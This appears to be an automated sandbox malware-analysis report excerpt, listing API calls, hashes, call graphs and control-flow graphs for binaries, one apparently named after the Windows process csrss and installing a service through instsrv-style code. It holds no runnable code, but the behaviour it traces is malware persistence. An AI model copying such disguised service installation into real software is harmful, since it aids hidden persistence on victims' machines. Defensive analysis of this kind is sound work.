                            • Part of subcall function 00222EDA: GetLastError.KERNEL32(?,?,0022080C,00244590,00000010), ref: 00222EDE
                            • Part of subcall function 00222EDA: _free.LIBCMT ref: 00222F11
                            • Part of subcall function 00222EDA: SetLastError.KERNEL32(00000000), ref: 00222F52
                            • Part of subcall function 00222EDA: _abort.LIBCMT ref: 00222F58
                            • Part of subcall function 002257D0: _abort.LIBCMT ref: 00225802
                            • Part of subcall function 002257D0: _free.LIBCMT ref: 00225836
                            • Part of subcall function 00225445: GetOEMCP.KERNEL32(00000000), ref: 00225470
                          • _free.LIBCMT ref: 00225729
                          • _free.LIBCMT ref: 0022575F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _free$ErrorLast_abort
                          • String ID: d$
                          • API String ID: 2991157371-3651395310
                          • Opcode ID: e4d9f93ffecb8c7d78f442c213aecde124c9ef23340666b987242854771e5f3b
                          • Instruction ID: ca4c04d8d71f771c64cfe234983d0592c1a4d5e9e3acaa9418c497cfdcf71dbb
                          • Opcode Fuzzy Hash: e4d9f93ffecb8c7d78f442c213aecde124c9ef23340666b987242854771e5f3b
                          • Instruction Fuzzy Hash: B231BE31910625FFDB10EFE8F484BA9B7F5EF41320F258099E4049B291EB769E61DB10
                          APIs
                          • GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000207,?,?,00000000), ref: 001F2AB9
                          • _wcslen.LIBCMT ref: 001F2AC6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: EnvironmentVariable_wcslen
                          • String ID: APPDATA
                          • API String ID: 4168748220-4054820676
                          • Opcode ID: 49d1392a75972c0094b2d6bd2a4352fd008791b8be913e164fd25fd606bf07dc
                          • Instruction ID: 9a0ac6a487531360301a9e0415d3f8778ac437c07bcb3067663e9c5a304586fe
                          • Opcode Fuzzy Hash: 49d1392a75972c0094b2d6bd2a4352fd008791b8be913e164fd25fd606bf07dc
                          • Instruction Fuzzy Hash: 57218EB2A502199BCB24DF14DC917E9B3B4FF49300F5005AEEA09A7241E7346A94CF99
                          APIs
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000044,?), ref: 001E60DD
                          • CloseHandle.KERNEL32(?), ref: 001E60EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: D
                          • API String ID: 3712363035-2746444292
                          • Opcode ID: d874097e009268356ac0548926829ea099def829844aa1335dd13083c772f0d5
                          • Instruction ID: 09c426786d30fb6a67ec193235c1b7c6af6931e4b1a9c64df6d1c67cfad4da39
                          • Opcode Fuzzy Hash: d874097e009268356ac0548926829ea099def829844aa1335dd13083c772f0d5
                          • Instruction Fuzzy Hash: A2019A74900248ABCB14DFA9DC89EEF7BB9FB95B04F004419F508AB294D7B09588CFB5
                          APIs
                            • Part of subcall function 00222EDA: GetLastError.KERNEL32(?,?,0022080C,00244590,00000010), ref: 00222EDE
                            • Part of subcall function 00222EDA: _free.LIBCMT ref: 00222F11
                            • Part of subcall function 00222EDA: SetLastError.KERNEL32(00000000), ref: 00222F52
                            • Part of subcall function 00222EDA: _abort.LIBCMT ref: 00222F58
                          • _abort.LIBCMT ref: 00225802
                          • _free.LIBCMT ref: 00225836
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ErrorLast_abort_free
                          • String ID: d$
                          • API String ID: 289325740-3651395310
                          • Opcode ID: 47d54d21988ecd209189bf718bb4814fec51b2df63f185cc797e5c9cfd32cb73
                          • Instruction ID: c0325795c2baf185932182c60141ef6259ee7233cbab8990894dfb5d78f664d9
                          • Opcode Fuzzy Hash: 47d54d21988ecd209189bf718bb4814fec51b2df63f185cc797e5c9cfd32cb73
                          • Instruction Fuzzy Hash: 8F01A135C21A32FBCB21AF98B40165DF3A0EF05720B058209E95467681C7746DE1CFC2
                          APIs
                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0021AF75
                            • Part of subcall function 0021AEEC: std::exception::exception.LIBCONCRT ref: 0021AEF9
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0021AF83
                            • Part of subcall function 0021D84D: RaiseException.KERNEL32(?,?,?,0021B9D7,?,?,?,?,?,?,?,?,0021B9D7,?,00244410), ref: 0021D8AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                          • String ID: Unknown exception
                          • API String ID: 1586462112-410509341
                          • Opcode ID: 46d355a5cae688b09b74a798957db541de0da21a67e7380528a2cf7ef0648c4a
                          • Instruction ID: 0b22ce515dbaefb0405c4d9663e9f8ae478813068706509dc80c223b21ea3b4a
                          • Opcode Fuzzy Hash: 46d355a5cae688b09b74a798957db541de0da21a67e7380528a2cf7ef0648c4a
                          • Instruction Fuzzy Hash: 0ED0C779A2010CBBCB04FEE4C856EE97BAC7E60700B9084A4B524D7541E771F57A8AD1

                          Execution Graph

                          Execution Coverage:16.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:7.4%
                          Total number of Nodes:244
                          Total number of Limit Nodes:5
                          execution_graph 1372 401380 1375 4011fc 1372->1375 1376 40120d ExitProcess 1375->1376 1377 401209 1376->1377 1378 4026f0 1381 4026f8 1378->1381 1379 40277b 1381->1379 1382 401db4 RtlUnwind 1381->1382 1383 401dcc 1382->1383 1383->1381 1148 4029a2 1149 4029b8 1148->1149 1151 4029d4 1148->1151 1149->1151 1152 40300e 1149->1152 1153 403044 1152->1153 1163 403026 1152->1163 1154 403061 1153->1154 1155 40306e 1153->1155 1153->1163 1164 4031e3 1154->1164 1157 4030f8 WriteFile 1155->1157 1161 40307a 1155->1161 1158 403127 GetLastError 1157->1158 1159 403118 1157->1159 1158->1163 1159->1163 1160 40306b 1160->1155 1162 4030c2 WriteFile 1161->1162 1161->1163 1162->1158 1162->1161 1163->1151 1165 40320c 1164->1165 1168 4031f1 1164->1168 1166 40321c SetFilePointer 1165->1166 1167 403232 GetLastError 1166->1167 1166->1168 1167->1168 1168->1160 1384 401ca5 1385 401cf6 1384->1385 1387 401ce4 1384->1387 1388 402bea 1385->1388 1390 402c00 1388->1390 1397 402c94 1388->1397 1389 402c69 1391 402c75 1389->1391 1392 402cbc 1389->1392 1390->1389 1390->1397 1400 403258 1390->1400 1393 402c8a 1391->1393 1394 402c9b 1391->1394 1395 40300e 5 API calls 1392->1395 1396 40300e 5 API calls 1393->1396 1394->1397 1399 4031e3 2 API calls 1394->1399 1395->1397 1396->1397 1397->1387 1399->1397 1401 40283f 6 API calls 1400->1401 1402 40326d 1401->1402 1402->1389 1403 4031d8 1404 4013a5 WriteFile 1403->1404 1405 4031df 1404->1405 1406 4026f8 1407 40277b 1406->1407 1409 402712 1406->1409 1408 401db4 RtlUnwind 1408->1409 1409->1407 1409->1408 1410 401369 1413 401e73 1410->1413 1414 401e7e 1413->1414 1415 401fc4 UnhandledExceptionFilter 1414->1415 1416 40137c 1414->1416 1415->1416 1417 402a79 1422 402a04 1417->1422 1419 402a8c 1420 402a7e 1420->1419 1425 403668 1420->1425 1435 402a0f 1422->1435 1426 40367a 1425->1426 1433 4036a1 1425->1433 1427 4029a2 5 API calls 1426->1427 1426->1433 1428 403684 1427->1428 1439 40382c 1428->1439 1432 40369a 1432->1433 1450 40372e 1432->1450 1433->1420 1436 402a0b 1435->1436 1438 402a28 1435->1438 1436->1420 1437 402956 7 API calls 1437->1438 1438->1436 1438->1437 1440 40368f 1439->1440 1441 403838 1439->1441 1443 403796 1440->1443 1441->1440 1442 40372e WriteFile 1441->1442 1442->1440 1444 4037bf 1443->1444 1449 4037a4 1443->1449 1445 4037e9 CloseHandle 1444->1445 1446 403801 1444->1446 1445->1446 1447 4037f7 GetLastError 1445->1447 1454 40355a 1446->1454 1447->1446 1449->1432 1451 40374b 1450->1451 1452 403737 1450->1452 1451->1433 1452->1451 1453 402cf6 WriteFile 1452->1453 1453->1451 1455 40358a 1454->1455 1457 403567 1454->1457 1455->1449 1456 40359c SetStdHandle 1456->1455 1457->1455 1457->1456 1169 4012ac GetVersion 1170 40130c 1169->1170 1183 402560 GetStartupInfoA 1170->1183 1176 40132d GetEnvironmentStrings 1197 401ffe 1176->1197 1178 40133d 1206 4010e0 1178->1206 1180 40135e 1227 4011eb 1180->1227 1184 402579 1183->1184 1185 4025fb GetStdHandle 1184->1185 1187 401318 1184->1187 1185->1184 1186 402609 GetFileType 1185->1186 1186->1184 1188 402555 1187->1188 1230 4023c7 1188->1230 1190 40131d GetCommandLineA 1191 4020c9 GetModuleFileNameA 1190->1191 1192 4020f4 1191->1192 1240 40283f 1192->1240 1196 40212e 1196->1176 1198 402012 1197->1198 1199 40283f 6 API calls 1198->1199 1200 402039 1199->1200 1201 4013a5 WriteFile 1200->1201 1204 40204e 1200->1204 1201->1204 1202 4020ba 1202->1178 1203 40283f 6 API calls 1203->1204 1204->1202 1204->1203 1205 4013a5 WriteFile 1204->1205 1205->1204 1207 401126 OpenSCManagerA 1206->1207 1208 4010e8 1206->1208 1316 40386c 1207->1316 1318 40117f 1208->1318 1213 40117f 12 API calls 1216 4010ff 1213->1216 1214 401161 1336 401000 CreateServiceA 1214->1336 1215 401153 1325 401070 OpenServiceA 1215->1325 1220 40117f 12 API calls 1216->1220 1219 40115c 1221 401171 CloseServiceHandle 1219->1221 1222 40110c 1220->1222 1221->1180 1223 40117f 12 API calls 1222->1223 1224 401119 1223->1224 1225 4011eb ExitProcess 1224->1225 1226 401123 1225->1226 1226->1207 1364 40120d 1227->1364 1235 402329 1230->1235 1233 402412 GetCPInfo 1234 402426 1233->1234 1234->1190 1236 40233c GetOEMCP 1235->1236 1237 40234e 1235->1237 1238 402363 1236->1238 1237->1238 1239 402353 GetACP 1237->1239 1238->1233 1238->1234 1239->1238 1248 402852 1240->1248 1243 4013a5 1307 4027c1 1243->1307 1252 402869 1248->1252 1253 40211e 1248->1253 1249 4028c4 1249->1253 1265 402911 1249->1265 1252->1249 1252->1253 1255 402df1 1252->1255 1262 402cf6 1252->1262 1253->1196 1253->1243 1257 402e10 1255->1257 1256 402e41 1277 402eda 1256->1277 1257->1256 1259 402e31 1257->1259 1260 402e3c 1259->1260 1269 402e56 1259->1269 1260->1252 1263 4013a5 WriteFile 1262->1263 1264 402cfd 1263->1264 1264->1252 1266 402931 1265->1266 1268 402936 1265->1268 1267 4026cb VirtualAlloc 1266->1267 1267->1268 1268->1253 1270 402e72 VirtualAlloc 1269->1270 1272 402e97 1270->1272 1276 402eca 1270->1276 1273 402eda 4 API calls 1272->1273 1274 402ebd 1273->1274 1274->1276 1288 402f87 VirtualFree 1274->1288 1276->1260 1278 402f01 VirtualAlloc 1277->1278 1286 402f79 1277->1286 1280 402f52 1278->1280 1281 402f4c GetLastError 1278->1281 1282 402f60 1280->1282 1284 402cf6 WriteFile 1280->1284 1280->1286 1281->1280 1292 4032a3 1282->1292 1284->1282 1285 402f6d 1285->1286 1287 402cf6 WriteFile 1285->1287 1286->1260 1287->1286 1289 402fa6 1288->1289 1290 402fab 1288->1290 1291 402cf6 WriteFile 1289->1291 1290->1276 1291->1290 1301 4026cb 1292->1301 1295 4026cb VirtualAlloc 1296 4032d4 1295->1296 1297 4026cb VirtualAlloc 1296->1297 1300 403345 1296->1300 1298 4032e4 1297->1298 1299 402cf6 WriteFile 1298->1299 1298->1300 1299->1300 1300->1285 1302 4026d9 1301->1302 1303 4026d4 1301->1303 1302->1295 1302->1300 1305 402675 VirtualAlloc 1303->1305 1306 40268d 1305->1306 1306->1302 1306->1306 1308 4027e7 WriteFile 1307->1308 1309 4027cb 1308->1309 1310 4027e7 WriteFile 1309->1310 1311 4013aa 1310->1311 1312 4027e7 1311->1312 1313 4027f6 1312->1313 1314 402811 WriteFile 1313->1314 1315 4013b3 1313->1315 1314->1315 1315->1196 1317 40114c 1316->1317 1317->1214 1317->1215 1343 4013c5 1318->1343 1326 401090 GetLastError 1325->1326 1327 4010a5 DeleteService 1325->1327 1328 40117f 12 API calls 1326->1328 1329 4010c3 GetLastError 1327->1329 1330 4010b5 1327->1330 1333 4010a1 1328->1333 1332 40117f 12 API calls 1329->1332 1331 40117f 12 API calls 1330->1331 1334 4010bf 1331->1334 1335 4010d4 1332->1335 1333->1219 1334->1219 1335->1219 1337 401037 GetLastError 1336->1337 1338 40104d 1336->1338 1339 40117f 12 API calls 1337->1339 1340 40117f 12 API calls 1338->1340 1341 401048 1339->1341 1342 401058 CloseServiceHandle 1340->1342 1341->1219 1342->1219 1345 4013d3 1343->1345 1344 40118b 1347 40148c 1344->1347 1345->1344 1346 40283f 6 API calls 1345->1346 1346->1344 1348 4011a3 1347->1348 1351 4014b9 1347->1351 1354 401446 1348->1354 1349 401cd7 11 API calls 1349->1351 1350 402aa7 WideCharToMultiByte 1350->1351 1351->1348 1351->1349 1351->1350 1352 401d17 11 API calls 1351->1352 1353 401d48 11 API calls 1351->1353 1352->1351 1353->1351 1355 40147b 1354->1355 1356 401452 1354->1356 1357 4029a2 5 API calls 1355->1357 1359 4010f2 1355->1359 1356->1359 1360 4029a2 1356->1360 1357->1359 1359->1213 1361 4029b8 1360->1361 1363 4029d4 1360->1363 1362 40300e 5 API calls 1361->1362 1361->1363 1362->1363 1363->1359 1367 40122a 1364->1367 1365 4011f8 1366 40127f ExitProcess 1367->1365 1367->1366 1368 40120d 1371 40122a 1368->1371 1369 401289 1370 40127f ExitProcess 1371->1369 1371->1370

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_004027C1 29 Function_004027E7 0->29 1 Function_00402FC1 6 Function_004035C7 1->6 2 Function_004036C4 3 Function_004013C5 59 Function_00402A8D 3->59 82 Function_0040283F 3->82 4 Function_00401446 68 Function_004029A2 4->68 5 Function_004023C7 28 Function_00402364 5->28 71 Function_004023A3 5->71 76 Function_00402329 5->76 7 Function_00401D48 19 Function_00401CD7 7->19 8 Function_004020C9 24 Function_0040215F 8->24 72 Function_004013A5 8->72 8->82 9 Function_004026CB 40 Function_00402675 9->40 10 Function_00401DCC 11 Function_0040264E 12 Function_00401E50 13 Function_00401FD1 14 Function_00402852 38 Function_00402DF1 14->38 41 Function_00402CF6 14->41 53 Function_00402D01 14->53 64 Function_00402911 14->64 15 Function_00401DD4 16 Function_00402555 16->5 17 Function_00402E56 22 Function_00402EDA 17->22 55 Function_00402F87 17->55 18 Function_00402956 18->1 62 Function_00402A0F 18->62 18->68 32 Function_00402BEA 19->32 20 Function_00403258 20->82 21 Function_004031D8 21->72 22->41 70 Function_004032A3 22->70 23 Function_0040355A 25 Function_00402560 26 Function_004010E0 33 Function_004011EB 26->33 34 Function_0040386C 26->34 35 Function_00401070 26->35 49 Function_0040117F 26->49 51 Function_00401000 26->51 27 Function_004031E3 27->6 47 Function_004035FF 27->47 30 Function_00403668 65 Function_00403796 30->65 30->68 78 Function_0040382C 30->78 79 Function_0040372E 30->79 31 Function_00401369 39 Function_00401E73 31->39 32->20 32->27 32->59 60 Function_0040300E 32->60 58 Function_0040120D 33->58 35->49 36 Function_004026F0 42 Function_00401DF6 36->42 80 Function_00401DB4 36->80 37 Function_004034F1 38->17 38->22 39->13 41->72 43 Function_004026F8 43->42 43->80 44 Function_00402A79 44->30 54 Function_00402A04 44->54 45 Function_004011FC 45->58 46 Function_00401FFE 46->72 46->82 48 Function_00401D7F 49->3 49->4 57 Function_0040148C 49->57 50 Function_00402B80 51->49 52 Function_00401380 52->45 54->62 55->41 56 Function_0040128C 57->7 57->19 57->48 57->50 61 Function_00401D8E 57->61 66 Function_00401D17 57->66 67 Function_00402B20 57->67 69 Function_00401DA2 57->69 75 Function_00402AA7 57->75 58->56 60->27 60->47 62->18 63 Function_00407710 64->9 65->6 65->23 65->47 66->19 68->60 70->2 70->9 70->37 70->41 72->0 72->29 73 Function_00401CA5 73->32 74 Function_004027A6 74->42 77 Function_004012AC 77->8 77->11 77->16 77->25 77->26 77->33 77->46 81 Function_004011BB 77->81 78->79 79->41 81->56 82->14

                          Control-flow Graph

                          APIs
                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,0040135E,00000003,00B00004,00B00070), ref: 0040112F
                          • CloseServiceHandle.ADVAPI32(?), ref: 00401177
                            • Part of subcall function 00401000: CreateServiceA.ADVAPI32(?,00000000,00000000,000F01FF,00000010,00000002,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,0040116E,00000000), ref: 00401028
                            • Part of subcall function 00401000: GetLastError.KERNEL32 ref: 00401037
                          Strings
                          • remove, xrefs: 00401139
                          • to remove a service, xrefs: 0040110F
                          • to install a service, or:, xrefs: 004010F5
                          • instsrv <service name> remove, xrefs: 00401102
                          • usage: instsrv <service name> <exe location>, xrefs: 004010E8
                          Memory Dump Source
                          • Source File: 00000009.00000002.2151583139.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.2151572483.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151598015.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151609720.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_csrss.jbxd
                          Similarity
                          • API ID: Service$CloseCreateErrorHandleLastManagerOpen
                          • String ID: to install a service, or:$ to remove a service$ instsrv <service name> remove$remove$usage: instsrv <service name> <exe location>
                          • API String ID: 710590943-85595265
                          • Opcode ID: 4909e3e4582a22af6c748da90620287d2624ef1429a5e3185fc1039badab6610
                          • Instruction ID: 353319d7dfe2037f4ed2078fb33779f003bb303dae6d8b9b3d59d45404ce68a6
                          • Opcode Fuzzy Hash: 4909e3e4582a22af6c748da90620287d2624ef1429a5e3185fc1039badab6610
                          • Instruction Fuzzy Hash: D201D4F6E4430077D214A7A1AD07F0B32A45B29709F00043AFB497E3E1E579F504865F

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 22 40300e-403024 23 403044-40304c 22->23 24 403026-40303f 22->24 25 403055-40305f 23->25 26 40304e-403050 23->26 27 4031a0-4031a6 24->27 28 403061-40306b call 4031e3 25->28 29 40306e-403078 25->29 26->27 28->29 31 4030f8-403116 WriteFile 29->31 32 40307a-403081 29->32 33 403127-40312d GetLastError 31->33 34 403118-403125 31->34 36 403084-40308c 32->36 37 403130-403134 33->37 34->37 36->37 38 403092 36->38 39 403136-40313a 37->39 40 40319b-40319e 37->40 41 403098-4030a0 38->41 42 403168-403172 39->42 43 40313c-403140 39->43 40->27 44 4030c2-4030ea WriteFile 41->44 45 4030a2-4030a7 41->45 50 403180-403199 42->50 51 403174-40317a 42->51 46 403142-403154 43->46 47 403156-40315e call 4035ff 43->47 44->33 52 4030ec-4030f4 44->52 48 4030a9-4030ad 45->48 49 4030ae-4030c0 45->49 53 403161-403166 46->53 47->53 48->49 49->41 49->44 50->27 51->50 55 40317c-40317e 51->55 52->36 56 4030f6 52->56 53->27 55->27 56->37
                          Memory Dump Source
                          • Source File: 00000009.00000002.2151583139.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.2151572483.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151598015.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151609720.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bab37958eb5f79b44f4d3209cebfb9d56f7b9b34d22085ddd48886632c47bb50
                          • Instruction ID: 8213edd86c4eb535c4edb0898bf23675c9af45821ea8eb930510e7946c953040
                          • Opcode Fuzzy Hash: bab37958eb5f79b44f4d3209cebfb9d56f7b9b34d22085ddd48886632c47bb50
                          • Instruction Fuzzy Hash: 7E419270904248AFDB10CF68DD88B9A7FB8BB08355F1045BAE915BB2D0C379AB45CB59

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 58 402560-402577 GetStartupInfoA 59 402579-402586 58->59 60 4025ce-4025d5 58->60 62 402588 59->62 63 40258d-4025ac 59->63 61 4025db-4025de 60->61 64 4025e0-4025eb 61->64 65 402634 61->65 62->63 66 4025b3-4025cc 63->66 67 4025ae 63->67 68 4025fb-402607 GetStdHandle 64->68 69 4025ed-4025f8 64->69 70 40263b-402645 65->70 66->60 67->66 68->70 71 402609-40261b GetFileType 68->71 69->68 70->61 72 402647-40264d 70->72 73 402626-402629 71->73 74 40261d-402624 71->74 73->70 75 40262b-402632 73->75 74->70 75->70
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 0040256D
                          • GetStdHandle.KERNEL32(FFFFFFF6), ref: 004025FC
                          • GetFileType.KERNELBASE(00000000), ref: 00402611
                          Memory Dump Source
                          • Source File: 00000009.00000002.2151583139.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.2151572483.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151598015.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151609720.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_csrss.jbxd
                          Similarity
                          • API ID: FileHandleInfoStartupType
                          • String ID:
                          • API String ID: 2461013171-0
                          • Opcode ID: 8c592e3be1bb84e285c318642baaeb7845c6dd863c1d3be7f53c5ba47c60504d
                          • Instruction ID: 0baf37c9e7bd398683fb6dd673a0fcc94f3d0d7a6e3f053bebe0ad358307331e
                          • Opcode Fuzzy Hash: 8c592e3be1bb84e285c318642baaeb7845c6dd863c1d3be7f53c5ba47c60504d
                          • Instruction Fuzzy Hash: 2B212372D0400587DF10CA78CA8C69F77A4AB01334F650776D865BB3C1C378BD46D69A

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 76 402eda-402eff 77 402f01-402f30 76->77 78 402f7d 76->78 80 402f32 77->80 81 402f34-402f4a VirtualAlloc 77->81 79 402f82-402f86 78->79 80->81 82 402f52-402f54 81->82 83 402f4c GetLastError 81->83 84 402f60-402f68 call 4032a3 82->84 85 402f56-402f59 82->85 83->82 89 402f6d-402f72 84->89 85->78 86 402f5b call 402cf6 85->86 86->84 90 402f74 call 402cf6 89->90 91 402f79-402f7b 89->91 90->91 91->79
                          APIs
                          • VirtualAlloc.KERNELBASE(?,00404119,00001000,00000004,00000000,00000000,00404118,?,00402E48,00000000,00401887,0040284B,00000000,?,0040288A,0040284B), ref: 00402F3D
                          • GetLastError.KERNEL32 ref: 00402F4C
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2151583139.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.2151572483.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151598015.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151609720.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_csrss.jbxd
                          Similarity
                          • API ID: AllocErrorLastVirtual
                          • String ID: K(@
                          • API String ID: 497505419-2819576841
                          • Opcode ID: cf884d1dd445a6021487f831ead31643f1ffdc67dd9da17a93c4d922c4b2aaa2
                          • Instruction ID: 81ba2ce6713000aaf0f46ef24502ef6d392efc0e79580b6452652e24c231f545
                          • Opcode Fuzzy Hash: cf884d1dd445a6021487f831ead31643f1ffdc67dd9da17a93c4d922c4b2aaa2
                          • Instruction Fuzzy Hash: BC1159B17002161BC3249B388F8DA1BBB68EFD0791F00063AF959B63D1DA74A85095AC

                          Control-flow Graph

                          APIs
                          • GetVersion.KERNEL32 ref: 004012D2
                            • Part of subcall function 00402560: GetStartupInfoA.KERNEL32(?), ref: 0040256D
                            • Part of subcall function 00402560: GetStdHandle.KERNEL32(FFFFFFF6), ref: 004025FC
                            • Part of subcall function 00402560: GetFileType.KERNELBASE(00000000), ref: 00402611
                          • GetCommandLineA.KERNEL32 ref: 0040131D
                            • Part of subcall function 004020C9: GetModuleFileNameA.KERNEL32(00000000,00404000,00000104), ref: 004020DE
                          • GetEnvironmentStrings.KERNELBASE ref: 0040132D
                            • Part of subcall function 004010E0: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,0040135E,00000003,00B00004,00B00070), ref: 0040112F
